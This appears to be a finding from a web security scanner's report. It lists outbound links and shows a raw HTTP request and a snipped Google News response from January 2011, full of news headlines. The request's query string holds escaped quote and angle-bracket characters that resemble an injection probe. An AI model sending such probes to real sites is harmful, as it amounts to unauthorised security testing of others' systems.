  • http://www.washingtonpost.com/wp-dyn/content/article/2011/01/20/AR2011012004349.html
  • http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012400144.html
  • http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012401933.html
  • http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012406094.html
  • http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012406343.html
  • http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012406396.html
  • http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012406470.html
  • http://www.washingtonpost.com/wp-dyn/content/article/2011/01/25/AR2011012501351.html
  • http://www.washingtonpost.com/wp-dyn/content/article/2011/01/25/AR2011012501926.html
  • http://www.wdel.com/story.php?id=31917
  • http://www.webmd.com/hypertension-high-blood-pressure/news/20110124/heart-benefits-for-women-who-cut-hypertension
  • http://www.whec.com/news/stories/S1941039.shtml?cat=566
  • http://www.wired.com/threatlevel/2011/01/twitter/
  • http://www.wivb.com/dpps/news/nation/west/ore-town-in-fear-as-police-seek-shooting-suspect-nt11-jgr_3704164
  • http://www.ynetnews.com/articles/0,7340,L-4018734,00.html
  • http://www.youtube.com/?hl=en&tab=n1
  • http://www.youtube.com/watch?v=AMxZxlkv-6o
  • http://www.youtube.com/watch?v=Ay5CfV-_438
  • http://www.youtube.com/watch?v=CWAuaVf-QPI
  • http://www.youtube.com/watch?v=Dye1RPvkcB0
  • http://www.youtube.com/watch?v=F3y6v2G97pg
  • http://www.youtube.com/watch?v=NJLHvIL-G4M
  • http://www.youtube.com/watch?v=OfNTrVD0N4c
  • http://www.youtube.com/watch?v=V36fQu0Vk80
  • http://www.youtube.com/watch?v=ZfhFBl-goZk
  • http://www.youtube.com/watch?v=ashZeYCLLKw
  • http://www.youtube.com/watch?v=bzno493XK5M
  • http://www.youtube.com/watch?v=eVzgsG-PBuQ
  • http://www.youtube.com/watch?v=pUzMhGLMFgQ
  • http://www.youtube.com/watch?v=z2WlJe4mlSY
  • http://www.zdnet.co.uk/news/application-development/2011/01/24/mozilla-outlines-firefox-do-not-track-tool-40091531/
  • http://www.zdnet.com/blog/burnette/oops-no-copied-java-code-or-weapons-of-mass-destruction-found-in-android/2162
  • http://www2.tbo.com/content/2011/jan/24/250400/cutlers-passion-questionable-not-his-toughness/

Request

GET /news/story?hl\\x3den\\x26amp;sugexp\\x3dldymls\\x26amp;xhr\\x3dt\\x26amp;q\\x3damazon\\x26amp;cp\\x3d1\\x26amp;um\\x3d1\\x26amp;ie\\x3dUTF-8\\x26amp;ncl\\x3ddMP3JjJDFIJRJIMQcYiNzx8PKdjKM\\x26amp;ei\\x3dh5I9TauLMMK88gazprSzCg\\x26amp;sa\\x3dX\\x26amp;oi\\x3dnews_result\\x26amp;ct\\x3dmore-results\\x26amp;resnum\\x3d11\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CHYQqgIwCg\\x22\\x3e38 HTTP/1.1
Host: news.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: NID=43=VwAZLhltsvBR8u6zOflKl0SDPwqi8XArv6B83B7vSRoCX_l7sUINDPf3WrszS0RjAfOY3X2gHAOhoCZIgbuZymGGQ07ZKjiBzkxKtT8dnxWnAdkfJ2q3ZlQQMVsWGSUi;Domain=.google.com;Path=/;Expires=Wed, 27-Jul-2011 14:26:06 GMT;HttpOnly
Date: Tue, 25 Jan 2011 14:26:06 GMT
Expires: Tue, 25 Jan 2011 14:26:06 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...
</title>
<link href="http://www.gstatic.com/news/img/favicon.ico" rel="icon" type="image/x-icon">
<link rel="alternate" type="application/rss+xml" href="http://news.google.com/news?pz=1&amp;cf=all&amp;ned=us&amp;hl=en&amp;topic=h&amp;num=3&amp;output=rss">
...[SNIP]...
</div><a href="http://www.youtube.com/?hl=en&tab=n1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<a href="/news?pz=1&amp;ned=us"><img src="http://www.gstatic.com/news/img/logo/en_us/news.gif" width="171" height="40" alt="Google News"></a>
...[SNIP]...
<span class="sel"><img class="chip nav-0" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=ss&amp;ict=ln" class="persistentblue"><img class="chip nav-ss" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>Starred<img class="icon star-icon star-nav starred" alt="" src="http://www.gstatic.com/news/img/cleardot.gif"></span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=w&amp;ict=ln" class="persistentblue"><img class="chip nav-w" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;geo=detect_metro_area&amp;ict=ln" class="persistentblue"><img class="chip nav-1" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=n&amp;ict=ln" class="persistentblue"><img class="chip nav-n" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=b&amp;ict=ln" class="persistentblue"><img class="chip nav-b" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=t&amp;ict=ln" class="persistentblue"><img class="chip nav-t" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=e&amp;ict=ln" class="persistentblue"><img class="chip nav-e" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=s&amp;ict=ln" class="persistentblue"><img class="chip nav-s" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=m&amp;ict=ln" class="persistentblue"><img class="chip nav-m" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=ir&amp;ict=ln" class="persistentblue"><img class="chip nav-ir" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<div id="rhc-toggler" class="rhc-toggler"><img id="rhc-toggler-image" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" class="icon rhc-toggler-icon expanded"></div>
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.ctv.ca/CTVNews/World/20110123/obama-state-union-110123/" class="usg-AFQjCNH02kUfthKCE92PXDBgC02gic3LZg " title="CTV.ca"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/l2LZVd_dX5rO8M/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.ctv.ca/CTVNews/World/20110123/obama-state-union-110123/" class="usg-AFQjCNH02kUfthKCE92PXDBgC02gic3LZg "> CTV.ca </a>
...[SNIP]...
<h2 class="title sel"> <a target="_blank" class="usg-AFQjCNE7Vwk-Qa_sZ9z72Cn2EtSMJI2j4A " href="http://www.reuters.com/article/idUSN2525117520110125" id="MAA4AEgAUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=pUzMhGLMFgQ">Video:&nbsp;
Obama to Focus on Economy in Tuesday Address
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.cbsnews.com/stories/2011/01/25/politics/main7280843.shtml" target="_blank" class="usg-AFQjCNHHtSqbZ3-3cRPJEgu_uvDA0zfmGg " id="MAA4AEgAUAFgAmoCdXM">Obama to Seek Balance before Divided Congress</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGUsVQVKmIv3zvO5QqlgBI0VTK7Bg " href="http://feeds.nytimes.com/click.phdo?i=c37a68a9d6c79074b075c0a6b2ae297e" id="MAA4AEgAUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFd3L_NczRkYYaSyi6l4TDxyz_MPQ " href="http://www.npr.org/2011/01/25/133204546/the-root-why-obamas-speech-needs-to-play-it-safe" id="MAA4AEgAUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNH4X2RBdB48v8y-fxtdopp5GU1JnQ " href="http://abcnews.go.com/US/president-obama-delivers-state-union-tonight-issue-important/story?id=12747572" id="MAA4AEgAUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGcxqmcTJAqTpQk5GlOyJwheNHNzA " href="http://content.usatoday.com/communities/theoval/post/2011/01/obamas-day-state-of-the-union-1/1" id="MAA4AEgAUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://montreal.ctv.ca/servlet/an/local/CTVNews/20110125/airport-bomb-moscow-110125/20110125/?hub=MontrealHome" class="usg-AFQjCNH-T7c0pyCgzwM9w1R8PGkZBCVj3w " title="CTV.ca"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/pdw41_LrPaNSwM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://montreal.ctv.ca/servlet/an/local/CTVNews/20110125/airport-bomb-moscow-110125/20110125/?hub=MontrealHome" class="usg-AFQjCNH-T7c0pyCgzwM9w1R8PGkZBCVj3w "> CTV.ca </a>
...[SNIP]...
<h2 class="title sel"> <a target="_blank" class="usg-AFQjCNEuOgHgFhSFsE9OYmd5a2HRm0MTEA " href="http://www.bbc.co.uk/news/uk-12278369" id="MAA4AEgBUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=bzno493XK5M">Video:&nbsp;
Terror Fears: Savage explosion at Domodedovo airport shocks Russia
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://en.rian.ru/analysis/20110125/162296627.html" target="_blank" class="usg-AFQjCNHsV0WVSMU7BivakTp-qBPi9CJjwA " id="MAA4AEgBUAFgAmoCdXM">Terrorists exploit security loophole in deadly Moscow airport blast</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGxTYZNqx9Pqfs5kxkoLCGrHwTuKw " href="http://www.csmonitor.com/World/terrorism-security/2011/0125/Moscow-terrorist-attack-blamed-on-airport-security-lapses" id="MAA4AEgBUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFXU8j1cMZh_AGcRx4h9byCKipUYA " href="http://abcnews.go.com/Business/wireStory?id=12755356" id="MAA4AEgBUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEf884Is-krOtFly-f6dap_-WE5pg " href="http://www.ajc.com/business/moscow-blast-may-cause-815105.html" id="MAA4AEgBUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.msnbc.msn.com/id/41247842/ns/world_news-mideastn_africa/" class="usg-AFQjCNEObXCSMyFFg23_CLj7q-3Ic66PiQ " title="msnbc.com"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/sEKWE5k1cQjO7M/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.msnbc.msn.com/id/41247842/ns/world_news-mideastn_africa/" class="usg-AFQjCNEObXCSMyFFg23_CLj7q-3Ic66PiQ "> msnbc.com </a>
...[SNIP]...
<h2 class="title sel"> <a target="_blank" class="usg-AFQjCNGJCGMec4aAF6jsyMH0o3M9k_Higg " href="http://www.nytimes.com/2011/01/26/world/middleeast/26lebanon.html?src=mv" id="MAA4AEgCUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=OfNTrVD0N4c">Video:&nbsp;
Day of Rage: Fire, gunshots, clashes in Lebanon's Beirut & Tripoli
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.cnn.com/2011/WORLD/meast/01/25/lebanon.protests/" target="_blank" class="usg-AFQjCNHmqKy1P9U2-7wDaUrIvCHi2wdhRQ " id="MAA4AEgCUAFgAmoCdXM">In Lebanon, angry protests as a new PM is named</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGjCYyjpabgS18o8SjBBmWqCFcd7Q " href="http://online.wsj.com/article/SB10001424052748704698004576103760527993764.html" id="MAA4AEgCUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFZAyGwNZT-1PI-dCnKg6q2PnxPoA " href="http://www.voanews.com/english/news/middle-east/Hariri-Supporters-Gather-for-Day-of-Rage-in-Lebanon--114537104.html" id="MAA4AEgCUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGkmWfO_v_jlzuW53qVhlIG_jalMQ " href="http://www.ynetnews.com/articles/0,7340,L-4018734,00.html" id="MAA4AEgCUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGP2Lx4HObwksI_VucgzX0JwKLidA " href="http://news.xinhuanet.com/english2010/world/2011-01/25/c_13706780.htm" id="MAA4AEgCUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
</div> <img class="chip nav-w" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-n" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-b" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-t" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-e" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-s" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-m" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://espn.go.com/nfl/notebook/_/page/lastcall1020/john-clayton-last-call" class="usg-AFQjCNHJ-UUXK3fpuPLIcgyQe2NAtYVDZA " title="ESPN (blog)"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/ze_Jah1aKnczKM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://espn.go.com/nfl/notebook/_/page/lastcall1020/john-clayton-last-call" class="usg-AFQjCNHJ-UUXK3fpuPLIcgyQe2NAtYVDZA "> ESPN (blog) </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNF1-j7B-WS6b4KS2j6SaVujbMit3Q " href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/25/AR2011012501926.html" id="MAA4AEgDUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=NJLHvIL-G4M">Video:&nbsp;
Packers Win but Bears' Cutler Grabs Headlines
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www2.tbo.com/content/2011/jan/24/250400/cutlers-passion-questionable-not-his-toughness/" target="_blank" class="usg-AFQjCNFizdGGZBlsZzU4lRWmIiomju7WDQ " id="MAA4AEgDUAFgAmoCdXM">Cutler&#39;s passion questionable, not his toughness</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHUrBKIcblqlwoyWEq8lYQAOjLyeA " href="http://www.wdel.com/story.php?id=31917" id="MAA4AEgDUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNE-bVr9MRWtioD4FbW9m8rRv4jKwg " href="http://www.indystar.com/article/20110125/SPORTS03/101250341/Those-who-know-Cutler-well-have-his-back-over-injury?odyssey=tab%7Cmostpopular%7Ctext%7CSPORTS" id="MAA4AEgDUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHZToo71qS9mtu5zyHRWzSS8YWk6Q " href="http://www.myfoxchicago.com/dpp/news/metro/john-stone-car-salesman-fired-green-bay-packers-tie-chicago-20110125" id="MAA4AEgDUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG3z0n4wX_WIMMptgoaL-KE5N0xhw " href="http://beargoggleson.com/2011/01/25/chicago-car-salesman-fired-for-wearing-packers-tie/" id="MAA4AEgDUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.ctv.ca/CTVNews/Entertainment/20110125/royals-wedding-110125/" class="usg-AFQjCNEusORqqQrLSVfgI9cchB5gMfFUtw " title="CTV.ca"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/iMpPYm2zLW2H9M/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.ctv.ca/CTVNews/Entertainment/20110125/royals-wedding-110125/" class="usg-AFQjCNEusORqqQrLSVfgI9cchB5gMfFUtw "> CTV.ca </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGizn8FdbrlNoarxp9b2ChITIuSnQ " href="http://www.people.com/people/package/article/0,,20395222_20459577,00.html" id="MAA4AEgEUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://newsfeed.time.com/2011/01/25/working-girl-to-royal-housewife-kate-middleton-quits-her-day-job/" target="_blank" class="usg-AFQjCNEy23pIeiwJOGqBOnxw3QMGH9MKpg " id="MAA4AEgEUAFgAmoCdXM">Working Girl to Royal Housewife: Kate Middleton Quits Her Day Job</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFECASiQrBtdHvW_9W0yts5KDSoHA " href="http://www.dailymail.co.uk/news/article-1350151/Kate-Middleton-prepares-Royal-housewife-life-leaving-parents-business.html?ito=feeds-newsxml" id="MAA4AEgEUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFl2VrqsfwEp8U6iWvchJszI29KoA " href="http://travel.usatoday.com/destinations/dispatches/post/2011/01/london-businesses-are-pushing-royal-wedding-packages-souvenirs/139960/1" id="MAA4AEgEUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHHos6MO-HxbA1cqVFYOczn474tAA " href="http://www.reuters.com/article/idUSTRE70N73S20110124" id="MAA4AEgEUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012400144.html" class="usg-AFQjCNE75OdmGa6wWboDK9ggLrhiJWVEAw " title="Washington Post"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/zzuaChiS-OW1xM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012400144.html" class="usg-AFQjCNE75OdmGa6wWboDK9ggLrhiJWVEAw "> Washington ... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNEgD_IaVkDTWoies8fgQaFficXY0Q " href="http://msn.foxsports.com/nfl/story/Steelers-ground-Jets-head-to-Super-Bowl-XLV-80094778" id="MAA4AEgFUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=Dye1RPvkcB0">Video:&nbsp;
Jets lose to Steelers in AFC championship game
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://pittsburgh.sbnation.com/pittsburgh-steelers/2011/1/25/1954878/2011-super-bowl-pittsburgh-connections-green-bay-coaching-steelers-packers" target="_blank" class="usg-AFQjCNFtPlMqUrlhqvDofcXKtm0xg2Mjtg " id="MAA4AEgFUAFgAmoCdXM">2011 Super Bowl: Pittsburgh Connections Dominate Green Bay Coaching Staff</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNH-Kxlqid8b-IfRxyra4u0KauMIoA " href="http://www.nydailynews.com/sports/football/jets/2011/01/25/2011-01-25_rex_ryan_jets_proved_they_werent_ready_for_super_bowl_when_they_failed_to_gain_o.html?r=sports" id="MAA4AEgFUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFIhJoynuZBqroSpyNBnpnrbmCmGQ " href="http://www.locksmithsportspicks.com/super-bowl-45-betting-odds/" id="MAA4AEgFUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGMpJiNmDogxbdBXhcsuNwAd8h8ng " href="http://www.nytimes.com/2011/01/25/sports/football/25moments.html" id="MAA4AEgFUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHoxIksLdOiX2EP01Fp8STAYjKlTw " href="http://www.dallasnews.com/sports/super-bowl/20110124-melded-together-steelers-fans-share-special-bond-forged-in-fire.ece" id="MAA4AEgFUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.reuters.com/article/idUSTRE70M0EM20110125" class="usg-AFQjCNFTNRzPxDT-HAxe-GeQ6gLW_AJQjQ " title="Reuters"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/wxCcL8eCTK7UkM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.reuters.com/article/idUSTRE70M0EM20110125" class="usg-AFQjCNFTNRzPxDT-HAxe-GeQ6gLW_AJQjQ "> Reuters </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHtiSGBKgb8AJ3pLsUWCx1en_clvQ " href="http://news.xinhuanet.com/english2010/world/2011-01/25/c_13706837.htm" id="MAA4AEgGUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=z2WlJe4mlSY">Video:&nbsp;
The Palestine Papers: Refugees' right of return on bargaining table
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.guardian.co.uk/world/2011/jan/25/palestine-papers-refugees-south-america" target="_blank" class="usg-AFQjCNHF-80bO00nIupmnFw1092G1GWWCQ " id="MAA4AEgGUAFgAmoCdXM">Palestinians condemn US plan to settle refugees in South America</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHohl3vOEbaeeKD18YoSOK366LIZg " href="http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12275942" id="MAA4AEgGUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNELlHb-F-z9krtQRtJ8LPf3lMtxZg " href="http://www.haaretz.com/news/diplomacy-defense/hamas-urges-palestinian-refugees-to-protest-over-concessions-on-right-of-return-1.339120" id="MAA4AEgGUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEe7t59kCLaZEPNgdIrx-d03Dyb5w " href="http://www.jpost.com/DiplomacyAndPolitics/Article.aspx?id=205147" id="MAA4AEgGUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEIR3qqw7II_X8azn_RfNVJcHt6tQ " href="http://gulfnews.com/news/region/palestinian-territories/pna-to-sue-al-jazeera-channel-1.751956" id="MAA4AEgGUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.zdnet.co.uk/news/application-development/2011/01/24/mozilla-outlines-firefox-do-not-track-tool-40091531/" class="usg-AFQjCNFhh7er7SVh-GkRPm4nIGuMglUXPw " title="ZDNet UK"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/KH3wcH3fa03OHM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.zdnet.co.uk/news/application-development/2011/01/24/mozilla-outlines-firefox-do-not-track-tool-40091531/" class="usg-AFQjCNFhh7er7SVh-GkRPm4nIGuMglUXPw "> ZDNet UK </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGuDbOaMWITubQMDQRm3Vh0Egtf8g " href="http://www.cnn.com/2011/TECH/web/01/25/do.not.track.features.fc/" id="MAA4AEgHUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.techtree.com/India/News/Mozilla_to_Add_Do-not-track_Feature_to_Firefox/551-114274-643.html" target="_blank" class="usg-AFQjCNFfT6geWCCP6E2QzH5FUqDG1X_6iQ " id="MAA4AEgHUAFgAmoCdXM">Mozilla to Add Do-not-track Feature to Firefox</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.switched.com/2011/01/25/google-mozilla-adding-new-do-not-track-features-to-browsers/" target="_blank" class="usg-AFQjCNERbSCK3kCQuoNkwZjlOSimSLZmSw " id="MAA4AEgHUAJgAmoCdXM">Google, Mozilla Adding New &#39;Do Not Track&#39; Features to Browsers</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHKzocjpu5vlhh-D6N9fc595X4mmA " href="http://www.fudzilla.com/home/item/21654-firefox-google-chrome-adding-do-not-track-tools" id="MAA4AEgHUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNELbqLAIM8yn2z_8_-FVXf9K-dbYA " href="http://www.bbc.co.uk/go/rss/int/news/-/news/technology-12275750" id="MAA4AEgHUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFcQaqnZQeJ6RKQKdpso-J76DugIA " href="http://online.wsj.com/article/SB10001424052748704213404576100441609997236.html?mod=googlenews_wsj" id="MAA4AEgHUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHcZ0fugBcUA2k5qxjAGWVyS_21zQ " href="http://www.marketingpilgrim.com/2011/01/google-ad-track-blocker-%E2%80%9Ckeep-my-opt-outs%E2%80%9D-is-live.html" id="MAA4AEgHUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://today.msnbc.msn.com/id/41237457/ns/today-entertainment/" class="usg-AFQjCNEMaWZttwntQok4RRIdtirYaIN7mA " title="msnbc.com"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/uH0w557Gx5vRRM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://today.msnbc.msn.com/id/41237457/ns/today-entertainment/" class="usg-AFQjCNEMaWZttwntQok4RRIdtirYaIN7mA "> msnbc.com </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFctqmK23nef-iMoWXVheexj3Fc8Q " href="http://www.mtv.com/news/articles/1656569/skins-stars-despite-kissing-tony-tea-still-lesbian.jhtml" id="MAA4AEgIUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.nydailynews.com/entertainment/tv/2011/01/25/2011-01-25_skins_ep_2_recap_tea_tries_to_overcome_superiority_over_her_peers_group_faces_do.html" target="_blank" class="usg-AFQjCNH8bRcCEH29oi-7_xE6pfdD2yNA3g " id="MAA4AEgIUAFgAmoCdXM">&#39;Skins&#39;&#39; Tea (Sofia Black-D&#39;Elia) tries to overcome superiority over her peers</a>
...[SNIP]...
